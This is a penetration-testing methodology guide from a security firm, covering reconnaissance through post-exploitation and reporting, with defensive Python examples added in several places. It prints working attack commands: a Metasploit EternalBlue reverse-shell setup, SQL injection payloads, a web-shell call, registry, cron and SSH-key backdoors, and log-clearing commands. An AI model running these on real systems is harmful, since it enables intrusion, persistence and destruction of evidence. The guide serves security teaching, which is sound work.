Attack methodology provides a systematic framework for conducting professional penetration testing. This guide covers the complete attack lifecycle from reconnaissance to post-exploitation, helping security professionals execute thorough and effective assessments.
About Attack Methodology
A structured attack methodology ensures comprehensive coverage of all security aspects while maintaining professionalism and legal compliance. Understanding each phase is crucial for effective penetration testing.
Phase 1: Reconnaissance
Reconnaissance is the information gathering phase where attackers collect as much data as possible about the target. This phase is divided into passive and active reconnaissance.
Passive Reconnaissance
# WHOIS Lookup
whois target.com
# DNS Enumeration
dig target.com ANY
nslookup -type=any target.com
# Google Dorking
site:target.com filetype:pdf
site:target.com inurl:admin
# Social Media Intelligence
# LinkedIn, Twitter, Facebook research
# Employee identification
# Technology stack identification
Active Reconnaissance
# Network Scanning
nmap -sn 192.168.1.0/24
# Port Scanning
nmap -p- target.com
# Service Version Detection
nmap -sV -p 80,443,22,21 target.com
# OS Detection
nmap -O target.com
Phase 2: Scanning & Enumeration
This phase involves actively probing the target systems to identify vulnerabilities, services, and potential entry points.
Legal Compliance
Always ensure you have written authorization before conducting any active scanning or penetration testing activities. Unauthorized scanning may be illegal in many jurisdictions.
Network Scanning
# Comprehensive Port Scan
nmap -sS -sV -O -p- target.com -oA scan_results
# UDP Scan
nmap -sU -p 53,161,162,137,138,139 target.com
# Vulnerability Scanning
nmap --script vuln target.com
# NSE Scripts for Specific Services
nmap --script=http-enum target.com
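The `-oA scan_results` run above also writes `scan_results.gnmap`, nmap's greppable output. The following is an added example, not code from the original guide, that parses that format and reports open ports a host is not approved to expose; the two host lines, the baseline and the version strings are constructed for illustration.

```python
# Added example (not from the original guide): parse the greppable file that
# `-oA scan_results` writes (scan_results.gnmap) and compare each host's open
# ports with an approved baseline. Both host lines and the baseline are
# constructed for illustration, not real scan results.
import re

SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sS -sV -O -p- -oA scan_results 192.168.1.0/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 445/open/tcp//microsoft-ds///\tIgnored State: closed (65532)
Host: 192.168.1.20 ()\tPorts: 443/open/tcp//https//Apache httpd 2.4.52/\tIgnored State: filtered (65534)
"""
BASELINE = {  # assumed: (port, protocol) pairs each host is approved to expose
    "192.168.1.10": {(22, "tcp"), (80, "tcp")},
    "192.168.1.20": {(443, "tcp")},
}
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")


def parse_gnmap(text: str) -> dict:
    """Map host -> list of open-port dicts from nmap's greppable (-oG/-oA) output."""
    hosts = {}
    for line in text.splitlines():
        m = re.match(r"^Host: (\S+) .*?\tPorts: ([^\t]+)", line)
        if not m:
            continue  # comment lines and Status-only lines carry no port data
        host, ports_field = m.group(1), m.group(2)
        for entry in ports_field.split(", "):
            # Each entry is port/state/proto/owner/service/rpc/version/
            fields = dict(zip(PORT_FIELDS, entry.strip().split("/")))
            if fields.get("state") == "open":
                fields["port"] = int(fields["port"])
                hosts.setdefault(host, []).append(fields)
    return hosts


def unexpected_exposure(hosts: dict, baseline: dict) -> dict:
    """Open (port, proto) pairs per host that are absent from its baseline."""
    report = {}
    for host, ports in hosts.items():
        allowed = baseline.get(host, set())
        extra = sorted(
            (p["port"], p["proto"]) for p in ports
            if (p["port"], p["proto"]) not in allowed
        )
        if extra:
            report[host] = extra
    return report
```

On the sample above `unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), BASELINE)` reports only 445/tcp on 192.168.1.10, which is the kind of drift a scan-versus-baseline check should surface.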
Web Application Enumeration
# Directory Brute-forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# Subdomain Enumeration
subfinder -d target.com
amass enum -d target.com
# Technology Detection
whatweb http://target.com
# Wappalyzer (browser extension)
Phase 3: Gaining Access (Exploitation)
The exploitation phase involves actively attempting to gain unauthorized access to systems by exploiting identified vulnerabilities.
Common Exploitation Techniques
# Metasploit Framework
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit
# SQL Injection (Manual)
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
# Web Shell Upload
# Upload malicious PHP/ASP/JSP file
# Access: http://target.com/uploads/shell.php?cmd=whoami
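To see why the manual SQL injection payload above works and what closes it, here is an added example (not code from the original guide) that runs `' OR '1'='1` against a login query built by string concatenation and against the parameterized form; it uses an in-memory SQLite database with constructed sample accounts.

```python
# Added example (not from the original guide): the "' OR '1'='1" payload shown
# above, run against a query built by string concatenation and against the
# parameterized form. Uses an in-memory SQLite database with constructed
# sample accounts.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three accounts with fake passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The 'before' pattern: user input is spliced into the SQL text, so quotes
    in the input change the query's structure."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "' ORDER BY username"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The hardened form: placeholders keep the input as data, never as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY username"
    return [row[0] for row in conn.execute(query, (username, password))]


def demo() -> dict:
    conn = make_db()
    payload = "' OR '1'='1"  # the payload from the guide, used as both fields
    return {
        "vulnerable": login_vulnerable(conn, payload, payload),
        "parameterized": login_parameterized(conn, payload, payload),
        "legit": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated query becomes `WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'`, which is true for every row, while the parameterized query treats the same text as a literal username and matches nothing.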
Exploitation Best Practices
- Always test exploits in a controlled environment first
- Document all exploitation attempts and results
- Have a backup plan if primary exploit fails
- Consider system stability - avoid DoS conditions
- Use the least invasive method that achieves objectives
Phase 4: Maintaining Access
Once access is gained, attackers establish persistence to maintain long-term access to compromised systems.
Persistence Mechanisms
# Windows Persistence
# Registry Run Key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
# Scheduled Task
schtasks /create /tn "UpdateTask" /tr "C:\backdoor.exe" /sc daily /st 09:00
# Linux Persistence
# Cron Job
(crontab -l; echo "@reboot /tmp/backdoor.sh") | crontab -
# SSH Key Installation
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
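From the defender's side, the two Linux persistence spots above are simple to audit. The following is an added example, not code from the original guide, that flags cron entries running from temporary directories or at `@reboot`, and reports authorized_keys entries missing from a baseline; the crontab text, keys and baseline are constructed, and the list of suspicious directories is an assumption.

```python
# Added example (not from the original guide): audit the two Linux persistence
# spots shown above, crontab entries and ~/.ssh/authorized_keys, against a
# baseline. The inputs below are constructed text; on a real host feed it the
# output of `crontab -l` and the file contents.
import re

SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed: jobs should not run from here

SAMPLE_CRONTAB = "0 2 * * * /usr/local/bin/backup.sh\n@reboot /tmp/backdoor.sh\n"
SAMPLE_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleBaselineKey admin@laptop\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABExampleUnexpectedKey\n"
)
BASELINE_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleBaselineKey"}


def audit_crontab(crontab_text: str) -> list:
    """Return (entry, reason) pairs for cron entries that deserve a second look."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Either a special schedule (@reboot, @daily, ...) or five time fields, then the command.
        m = re.match(r"^(@\w+|(?:\S+\s+){5})\s*(.+)$", line)
        if not m:
            findings.append((line, "unparseable cron entry"))
            continue
        schedule, command = m.group(1).strip(), m.group(2)
        if any(d in command for d in SUSPICIOUS_DIRS):
            findings.append((line, "command runs from a temp directory"))
        elif schedule == "@reboot":
            findings.append((line, "@reboot entry: verify it is expected"))
    return findings


def audit_authorized_keys(keys_text: str, baseline: set) -> list:
    """Return keys present in authorized_keys but absent from the baseline."""
    unexpected = []
    for line in keys_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Skip any options prefix; "<type> <base64>" identifies the key, the comment does not.
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-", "sk-"))), 0)
        key = " ".join(parts[idx:idx + 2])
        if key not in baseline:
            unexpected.append(key)
    return unexpected
```

Comparing against a baseline rather than looking for known-bad strings is what makes the authorized_keys check useful: the planted key in the guide's example is indistinguishable from a legitimate one except that nobody approved it.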
Post-Exploitation Activities
- Privilege Escalation: Elevate access to administrator/root level
- Lateral Movement: Move to other systems in the network
- Data Exfiltration: Extract sensitive information
- Network Pivoting: Use compromised system to access isolated networks
- Credential Harvesting: Collect usernames, passwords, hashes
Phase 5: Covering Tracks
While ethical penetration testers document all activities, understanding anti-forensics techniques is important for defensive purposes and threat modeling.
# Windows Log Clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Linux Log Manipulation
echo "" > /var/log/auth.log
history -c
# Timestamp Modification
touch -r original_file modified_file
# Remove Tools and Artifacts
rm -rf /tmp/tools/
shred -vfz -n 10 sensitive_file.txt
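The `touch -r` trick above has a forensic tell: it copies atime and mtime from the reference file, but ctime cannot be set from user space and is bumped to the current time by that very call. The following is an added example, not code from the original guide, that scores a file by its mtime-to-ctime gap and scans a directory tree; the one-day threshold and the fixture files are assumptions, and a large gap is a triage signal rather than proof, since package installs and archive extraction with preserved timestamps produce the same pattern.

```python
# Added example (not from the original guide): touch -r copies atime and mtime
# from another file, but ctime cannot be set from user space and is bumped to
# "now" by that very call. A large mtime-to-ctime gap is a triage signal, not
# proof; the one-day threshold and the fixture files are assumptions.
import os
import tempfile
import time

DEFAULT_GAP_SECONDS = 24 * 3600  # assumed threshold: mtime more than a day before ctime


def timestomp_gap(mtime: float, ctime: float) -> float:
    """Seconds by which the content-modified time precedes the inode-change time."""
    return ctime - mtime


def looks_timestomped(path: str, gap_seconds: float = DEFAULT_GAP_SECONDS) -> bool:
    """True when the gap exceeds the threshold. Relies on Unix ctime semantics
    (on Windows st_ctime is the creation time, so this check does not apply)."""
    st = os.stat(path)
    return timestomp_gap(st.st_mtime, st.st_ctime) > gap_seconds


def scan_tree(root: str, gap_seconds: float = DEFAULT_GAP_SECONDS) -> list:
    """Paths (relative to root) whose timestamps show the touch -r pattern."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if looks_timestomped(path, gap_seconds):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def make_samples() -> str:
    """Constructed fixture: one file backdated the way touch -r would, one untouched."""
    root = tempfile.mkdtemp(prefix="timestomp_demo_")
    for name in ("original_file", "modified_file"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("sample\n")
    year_ago = time.time() - 365 * 24 * 3600
    # Equivalent of `touch -r <old file> modified_file`: atime/mtime go back a
    # year, while the kernel sets ctime to the current time.
    os.utime(os.path.join(root, "modified_file"), (year_ago, year_ago))
    return root


if __name__ == "__main__":
    print(scan_tree(make_samples()))
```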
Attack Frameworks and Standards
MITRE ATT&CK Framework
The MITRE ATT&CK framework is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It provides a comprehensive matrix of:
- Tactics: The "why" of an attack (Initial Access, Execution, Persistence, etc.)
- Techniques: The "how" of achieving tactical goals
- Procedures: Specific implementations of techniques
Cyber Kill Chain
HackHub Professional Services
Expert Penetration Testing by HackHub Team
With over 10 years of cybersecurity experience, the HackHub team provides comprehensive penetration testing services following industry-standard methodologies. Our systematic approach ensures thorough assessment of your security posture.
- Web Application Penetration Testing
- Internal Network Security Assessment
- Red Team Operations
- Social Engineering Assessments
Contact us at [email protected] for professional security services.
Reporting and Documentation
A professional penetration test is incomplete without proper documentation. The final report should include:
- Executive Summary: High-level overview for management
- Methodology: Detailed description of testing approach
- Findings: All vulnerabilities discovered with severity ratings
- Evidence: Screenshots, logs, and proof of concept
- Recommendations: Remediation steps for each finding
- Technical Details: Complete technical information for security teams
Ethical Guidelines
All penetration testing must be conducted ethically and legally:
- Obtain written authorization before testing
- Define clear scope and boundaries
- Respect privacy and data protection laws
- Report findings responsibly
- Do not cause unnecessary harm or disruption
Conclusion
A systematic attack methodology is essential for conducting professional and effective penetration tests. By following a structured approach through reconnaissance, scanning, exploitation, post-exploitation, and reporting, security professionals can thoroughly assess an organization's security posture and provide actionable recommendations for improvement.
Remember that penetration testing is both an art and a science - while methodologies provide structure, creativity and adaptability are equally important for success.